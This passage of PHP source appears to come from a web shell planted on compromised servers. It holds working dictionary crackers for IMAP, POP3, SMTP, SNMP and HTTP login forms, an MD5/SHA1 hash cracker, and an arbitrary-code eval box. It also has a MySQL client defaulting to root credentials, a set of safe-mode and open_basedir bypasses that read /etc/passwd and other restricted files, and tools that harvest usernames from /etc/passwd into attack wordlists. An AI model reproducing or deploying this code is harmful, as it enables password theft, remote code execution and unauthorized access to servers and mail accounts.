 787 function imaplogiN($host,$username,$password){
 788 $sock=fsockopen($host,143,$n,$s,5);
 789 $b=namE();
 790 $l=strlen($b);
 791 if(!$sock)return -1;
 792 fread($sock,1024);
 793 fputs($sock,"$b LOGIN $username $password\r\n");
 794 $res=fgets($sock,$l+4);
 795 if ($res == "$b OK")return 1;else return 0;
 796 fclose($sock);
 797 }
 798 function pop3logiN($server,$user,$pass){
 799 $sock=fsockopen($server,110,$en,$es,5);
 800 if(!$sock)return -1;
 801 fread($sock,1024);
 802 fwrite($sock,"user $user\n");
 803 $r=fgets($sock);
 804 if($r{0}=='-')return 0;
 805 fwrite($sock,"pass $pass\n");
 806 $r=fgets($sock);
 807 fclose($sock);
 808 if($r{0}=='+')return 1;
 809 return 0;
 810 }
 811 function imapcrackeR(){
 812 global $t,$et,$errorbox,$crack;
 813 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 814 $target=$_REQUEST['target'];
 815 $type=$_REQUEST['combo'];
 816 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
 817 $dictionary=fopen($_REQUEST['dictionary'],'r');
 818 if ($dictionary){
 819 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
 820 while(!feof($dictionary)){
 821 if($type){
 822 $combo=trim(fgets($dictionary)," \n\r");
 823 $user=substr($combo,0,strpos($combo,':'));
 824 $pass=substr($combo,strpos($combo,':')+1);
 825 }else{
 826 $pass=trim(fgets($dictionary)," \n\r");
 827 }
 828 $imap=imaplogiN($target,$user,$pass);
 829 if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
 830 if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
 831 flusheR();
 832 }
 833 echo "<br>Done</font>";
 834 fclose($dictionary);
 835 }
 836 else{
 837 echo "$errorbox Can not open dictionary.$et";
 838 }
 839 }else echo "<center>${t}IMAP cracker:$crack";
 840 }
 841 function snmpcrackeR(){
 842 global $t,$et,$errorbox,$crack,$hcwd;
 843 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 844 $target=$_REQUEST['target'];
 845 $dictionary=fopen($_REQUEST['dictionary'],'r');
 846 if ($dictionary){
 847 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
 848 while(!feof($dictionary)){
 849 $com=trim(fgets($dictionary)," \n\r");
 850 $res=snmpchecK($target,$com,2);
 851 if($res)echo "$com<br>";
 852 flusheR();
 853 }
 854 echo "<br>Done</font>";
 855 fclose($dictionary);
 856 }
 857 else{
 858 echo "$errorbox Can not open dictionary.$et";
 859 }
 860 }else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
 861 }
 862 function pop3crackeR(){
 863 global $t,$et,$errorbox,$crack;
 864 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 865 $target=$_REQUEST['target'];
 866 $type=$_REQUEST['combo'];
 867 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
 868 $dictionary=fopen($_REQUEST['dictionary'],'r');
 869 if ($dictionary){
 870 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
 871 while(!feof($dictionary)){
 872 if($type){
 873 $combo=trim(fgets($dictionary)," \n\r");
 874 $user=substr($combo,0,strpos($combo,':'));
 875 $pass=substr($combo,strpos($combo,':')+1);
 876 }else{
 877 $pass=trim(fgets($dictionary)," \n\r");
 878 }
 879 $pop3=pop3logiN($target,$user,$pass);
 880 if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{
 881 if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}}
 882 flusheR();
 883 }
 884 echo "<br>Done</font>";
 885 fclose($dictionary);
 886 }
 887 else{
 888 echo "$errorbox Can not open dictionary.$et";
 889 }
 890 }else echo "<center>${t}POP3 cracker:$crack";
 891 }
 892 function smtpcrackeR(){
 893 global $t,$et,$errorbox,$crack;
 894 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
 895 $target=$_REQUEST['target'];
 896 $type=$_REQUEST['combo'];
 897 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
 898 $dictionary=fopen($_REQUEST['dictionary'],'r');
 899 if ($dictionary){
 900 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
 901 while(!feof($dictionary)){
 902 if($type){
 903 $combo=trim(fgets($dictionary)," \n\r");
 904 $user=substr($combo,0,strpos($combo,':'));
 905 $pass=substr($combo,strpos($combo,':')+1);
 906 }else{
 907 $pass=trim(fgets($dictionary)," \n\r");
 908 }
 909 $smtp=smtplogiN($target,$user,$pass,5);
 910 if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{
 911 if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}}
 912 flusheR();
 913 }
 914 echo "<br>Done</font>";
 915 fclose($dictionary);
 916 }
 917 else{
 918 echo "$errorbox Can not open dictionary.$et";
 919 }
 920 }else echo "<center>${t}SMTP cracker:$crack";
 921 }
 922 function formcrackeR(){
 923 global $errorbox,$footer,$et,$hcwd;
 924 if(!empty($_REQUEST['start'])){
 925 $url=$_REQUEST['target'];
 926 $uf=$_REQUEST['userf'];
 927 $pf=$_REQUEST['passf'];
 928 $sf=$_REQUEST['submitf'];
 929 $sv=$_REQUEST['submitv'];
 930 $method=$_REQUEST['method'];
 931 $fail=$_REQUEST['fail'];
 932 $dic=$_REQUEST['dictionary'];
 933 $type=$_REQUEST['combo'];
 934 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
 935 if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
 936 $dictionary=fopen($dic,'r');
 937 echo "<font color=blue>Cracking started...<br>";
 938 while(!feof($dictionary)){
 939 if($type){
 940 $combo=trim(fgets($dictionary)," \n\r");
 941 $user=substr($combo,0,strpos($combo,':'));
 942 $pass=substr($combo,strpos($combo,':')+1);
 943 }else{
 944 $pass=trim(fgets($dictionary)," \n\r");
 945 }
 946 $url.="?$uf=$user&$pf=$pass&$sf=$sv";
 947 $res=check_urL($url,$method,$fail,12);
 948 if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
 949 flusheR();
 950 }
 951 fclose($dictionary);
 952 echo "Done!</font><br>";
 953 }
 954 else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
 955 }
 956 function hashcrackeR(){
 957 global $errorbox,$t,$et,$hcwd;
 958 if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){
 959 $dictionary=fopen($_REQUEST['dictionary'],'r');
 960 if ($dictionary){
 961 $hash=strtoupper($_REQUEST['hash']);
 962 echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR();
 963 $type=($_REQUEST['type']=='MD5')?'md5':'sha1';
 964 while(!feof($dictionary)){
 965 $word=trim(fgets($dictionary)," \n\r");
 966 if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;}
 967 }
 968 echo "Done!</font>";
 969 fclose($dictionary);
 970 }
 971 else{
 972 echo "$errorbox Can not open dictionary.$et";
 973 }
 974 }
 975 echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
 976 }
 977 function pr0xy(){
 978 global $errorbox,$et,$footer,$hcwd;
 979 echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
 980 if (!empty($_REQUEST['urL'])){
 981 $dir="";
 982 $u=parse_url($_REQUEST['urL']);
 983 $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
 984 if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
 985 $url=@fsockopen($host, 80, $errno, $errstr, 12);
 986 if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
 987 fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
 988 while(!feof($url)){
 989 $con = fgets($url);
 990 $con = str_replace("href=mailto","HrEf=mailto",$con);
 991 $con = str_replace("HREF=mailto","HrEf=mailto",$con);
 992 $con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
 993 $con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
 994 $con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
 995 $con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
 996 $con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
 997 $con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
 998 $con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
 999 $con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
1000 $con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
1001 $con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
1002 $con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
1003 $con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
1004 $con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
1005 $con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
1006 $con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
1007 $con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
1008 echo $con;
1009 }
1010 fclose($url);
1011 }
1012 }
1013 function mysqlclienT(){
1014 global $t,$errorbox,$et,$hcwd;
1015 if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
1016 $server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
1017 if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB'];
1018 $link = @mysql_connect($server,$user,$pass);
1019 if($link){
1020 if (!empty($db))mysql_select_db($db);
1021 $result=mysql_query($query,$link);
1022 echo "${t}Query result(s):$et";
1023 echo "<font color=blue><pre>";
1024 while($data=mysql_fetch_row($result)){
1025 foreach($data as $v) {
1026 echo $v;
1027 echo "\t";
1028 }
1029 echo "\n";
1030 }
1031 echo "</pre></font>";
1032 mysql_close($link);
1033 }
1034 else{
1035 echo "$errorbox Login failed!$et<br>";
1036 }
1037 }
1038 echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>";
1039 }
1040 function phpevaL(){
1041 global $t,$hcwd;
1042 if (!empty($_REQUEST['code'])){
1043 echo "<center><textarea rows=\"10\" cols=\"64\">";
1044 $code = str_replace("<?php","",$_REQUEST['code']);
1045 $code = str_replace("<?","",$code);
1046 $code = str_replace("?>","",$code);
1047 htmlspecialchars(eval($code));
1048 echo "</textarea></center><br>";
1049 }
1050 echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>";
1051 }
1052 function whoiS(){
1053 global $t,$hcwd;
1054 if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
1055 $server =$_REQUEST['server'];
1056 $domain=$_REQUEST['domain']."\r\n";
1057 $ser=fsockopen($server,43,$en,$es,5);
1058 fputs($ser,$domain);
1059 echo "<pre>";
1060 while(!feof($ser))echo fgets($ser);
1061 echo "</pre>";
1062 fclose($ser);
1063 }
1064 else{
1065 echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
1066 }
1067 }
1068 function hexvieW(){
1069 if (!empty($_REQUEST['filE'])){
1070 $f = $_REQUEST['filE'];
1071 echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>";
1072 $file = fopen($f,"r");
1073 $i= -1;
1074 while (!feof($file)) {
1075 $ln='';
1076 $i++;
1077 echo "<tr><td width=\"10%\" bgcolor=\"#";
1078 if ($i % 2==0) echo "666666";else echo "808080";
1079 echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>";
1080 echo "<td width=\"25%\" bgcolor=\"#";
1081 if ($i % 2==0) echo "666666";else echo "808080"; 
1082 echo "\">";
1083 for ($j=0;$j<=7;$j++){
1084 if (!feof($file)){
1085 $tmp = strtoupper(dechex(ord(fgetc($file))));
1086 if (strlen($tmp)==1) $tmp = "0".$tmp;
1087 echo $tmp." ";
1088 $ln.=$tmp;
1089 }
1090 }
1091 echo "</td><td width=\"25%\" bgcolor=\"#";
1092 if ($i % 2==0) echo "666666";else echo "808080"; 
1093 echo "\">";
1094 for ($j=7;$j<=14;$j++){
1095 if (!feof($file)){
1096 $tmp = strtoupper(dechex(ord(fgetc($file))));
1097 if (strlen($tmp)==1) $tmp = "0".$tmp;
1098 echo $tmp." ";
1099 $ln.=$tmp;
1100 }
1101 }
1102 echo "</td><td width=\"40%\" bgcolor=\"#";
1103 if ($i % 2==0) echo "666666";else echo "808080";
1104 echo "\">";
1105 $n=0;$asc="";$co=0;
1106 for ($k=0;$k<=16;$k++){
1107 $co=hexdec(substr($ln,$n,2));
1108 if (($co<=31)||(($co>=127)&&($co<=160)))$co=46;
1109 $asc.= chr($co);
1110 $n+=2;
1111 }
1112 echo htmlspecialchars($asc);
1113 echo "</td></tr>";
1114 }
1115 }
1116 fclose($file);
1117 echo "</table>";
1118 }
1119 function safemodE(){
1120 global $windows,$t,$hcwd;
1121 if (!empty($_REQUEST['file'])){
1122 $i=1;
1123 echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n";
1124 ini_restore("safe_mode");ini_restore("open_basedir");
1125 $tmp = file_get_contents($_REQUEST['file']);
1126 echo $tmp;
1127 $i++;
1128 echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n";
1129 $tmp=tempnam("","cx");
1130 copy("compress.zlib://".$_REQUEST['file'], $tmp);
1131 $fh = fopen($tmp, "r");
1132 $data = fread($fh, filesize($tmp));
1133 fclose($fh);
1134 echo $data;
1135 $i++;
1136 if(function_exists("curl_init")){
1137 echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n";
1138 $fh = @curl_init("file://".$_REQUEST['file']."");
1139 $tmp = @curl_exec($fh);
1140 echo $tmp;
1141 $i++;
1142 echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n";
1143 $i++;
1144 if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
1145 $ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
1146 else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
1147 curl_exec($ch);
1148 var_dump(curl_exec($ch));
1149 }
1150 if($_REQUEST['file'] == "/etc/passwd"){
1151 echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n";
1152 for($uid=0;$uid<99999;$uid++){
1153 $h=posix_getpwuid($uid);
1154 if (!empty($h))foreach($h as $v)echo "$v:";}}
1155 $i++;
1156 echo "</pre></font>";
1157 }
1158 echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>";
1159 }
1160 function crackeR(){
1161 global $et;
1162 $cwd = getcwd();
1163 echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>";
1164 }
1165 function dicmakeR(){
1166 global $errorbox,$windows,$footer,$t,$et,$hcwd;
1167 if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
1168 if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
1169 $min = $_REQUEST['min'];
1170 $max = $_REQUEST['max'];
1171 if($max<$min)die($errorbox ."Bad input!$et". $footer);
1172 $s =$w="";
1173 $out = $_REQUEST['output'];
1174 $r = ($_REQUEST['range']=='a' )?'a':'A';
1175 if ($_REQUEST['range']==0) $r=0;
1176 for($i=0;$i<$min;$i++) $s.=$r;
1177 $dic = fopen($out,'a');
1178 if(is_nan($r)){
1179 while(strlen($s)<=$max){
1180 $w = $s;
1181 if($combo)$w="$w:$w";
1182 fwrite($dic,$w."\n");
1183 $s++;}
1184 }
1185 else{
1186 while(strlen($w)<=$max){
1187 $w =(string)str_repeat("0",($min - strlen($s))).$s;
1188 if($combo)$w="$w:$w";
1189 fwrite($dic,$w."\n");
1190 $s++;}
1191 }
1192 fclose($dic);
1193 echo "<font color=blue>Done</font>";
1194 }
1195 if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
1196 $input=fopen($_REQUEST['input'],'r');
1197 if (!$input){
1198 if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
1199 else{
1200 $input=explode("\n",shelL("cat $input"));
1201 $output=fopen($_REQUEST['output'],'w');
1202 if ($output){
1203 foreach ($input as $in){
1204 $user = $in;
1205 $user = trim(fgets($in)," \n\r");
1206 if (!strstr($user,":"))continue;
1207 $user=substr($user,0,(strpos($user,':')));
1208 if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
1209 }
1210 fclose($input);fclose($output);
1211 echo "<font color=blue>Done</font>";
1212 }
1213 }
1214 }
1215 else{
1216 $output=fopen($_REQUEST['output'],'w');
1217 if ($output){
1218 while (!feof($input)){
1219 $user = trim(fgets($input)," \n\r");
1220 if (!strstr($user,":"))continue;
1221 $user=substr($user,0,(strpos($user,':')));
1222 if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
1223 }
1224 fclose($input);fclose($output);
1225 echo "<font color=blue>Done</font>";
1226 }
1227 else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
1228 }
1229 }elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
1230 $res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
1231 if($combo && $res){
1232 $file=file($_REQUEST['output']);
1233 $output=fopen($_REQUEST['output'],'w');
1234 foreach ($file as $v)fwrite($output,"$v:$v\n");
1235 fclose($output);
1236 }
1237 echo "<font color=blue>Done</font>";
1238 }else{
1239 $temp=whereistmP();
1240 echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";}
1241 }
1242 function calC(){
1243 global $t,$et,$hcwd;
1244 $fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode');
1245 if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
1246 echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">";
1247 if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i})));
1248 echo "</textarea>$et</center><br>";
1249 }
